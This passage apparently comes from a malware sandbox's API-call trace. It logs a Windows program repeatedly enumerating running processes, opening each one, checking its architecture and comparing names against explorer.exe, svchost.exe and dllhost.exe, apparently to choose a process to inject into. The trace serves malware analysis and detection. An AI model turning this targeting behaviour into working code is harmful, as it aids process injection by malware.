cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0259.841] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.841] CloseHandle (hObject=0xd8) returned 1 [0259.841] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0259.841] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0259.841] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0259.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0259.842] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.842] CloseHandle (hObject=0xd8) returned 1 [0259.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0259.842] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.842] CloseHandle (hObject=0xd8) returned 1 [0259.842] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0259.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0259.843] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0259.843] CloseHandle (hObject=0xd8) returned 1 [0259.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0259.844] CloseHandle (hObject=0xd4) returned 1 [0259.844] Sleep (dwMilliseconds=0x3e8) [0260.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0260.881] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0260.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0260.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0260.883] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0260.883] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0260.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0260.884] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0260.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0260.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0260.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0260.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0260.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0260.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0260.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0260.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0260.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0260.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0260.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0260.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0260.891] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.891] CloseHandle (hObject=0xd8) returned 1 [0260.891] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0260.891] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0260.891] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0260.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.891] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0260.891] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0260.892] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.892] CloseHandle (hObject=0xd8) returned 1 [0260.892] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0260.892] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0260.892] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0260.892] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0260.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0260.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0260.893] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0260.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0260.894] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.894] CloseHandle (hObject=0xd8) returned 1 [0260.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0260.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0260.894] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.894] CloseHandle (hObject=0xd8) returned 1 [0260.894] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0260.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0260.895] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.895] CloseHandle (hObject=0xd8) returned 1 [0260.895] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0260.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0260.895] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.895] CloseHandle (hObject=0xd8) returned 1 [0260.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0260.896] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0260.896] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.896] CloseHandle (hObject=0xd8) returned 1 [0260.896] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0260.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0260.897] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.897] CloseHandle (hObject=0xd8) returned 1 [0260.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0260.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0260.897] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.897] CloseHandle (hObject=0xd8) returned 1 [0260.897] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0260.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0260.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.898] CloseHandle (hObject=0xd8) returned 1 [0260.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0260.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0260.898] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.898] CloseHandle (hObject=0xd8) returned 1 [0260.898] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0260.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0260.899] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.899] CloseHandle (hObject=0xd8) returned 1 [0260.899] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0260.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0260.900] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.900] CloseHandle (hObject=0xd8) returned 1 [0260.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0260.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0260.900] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.900] CloseHandle (hObject=0xd8) returned 1 [0260.900] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0260.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0260.901] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.901] CloseHandle (hObject=0xd8) returned 1 [0260.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0260.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0260.901] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.901] CloseHandle (hObject=0xd8) returned 1 [0260.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0260.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0260.902] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.902] CloseHandle (hObject=0xd8) returned 1 [0260.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0260.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0260.903] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.903] CloseHandle (hObject=0xd8) returned 1 [0260.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0260.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0260.903] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.903] CloseHandle (hObject=0xd8) returned 1 [0260.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0260.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0260.904] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.904] CloseHandle (hObject=0xd8) returned 1 [0260.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0260.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0260.904] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.904] CloseHandle (hObject=0xd8) returned 1 [0260.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0260.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0260.905] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.905] CloseHandle (hObject=0xd8) returned 1 [0260.905] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0260.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0260.905] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0260.906] CloseHandle (hObject=0xd8) returned 1 [0260.906] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0260.906] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0260.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, 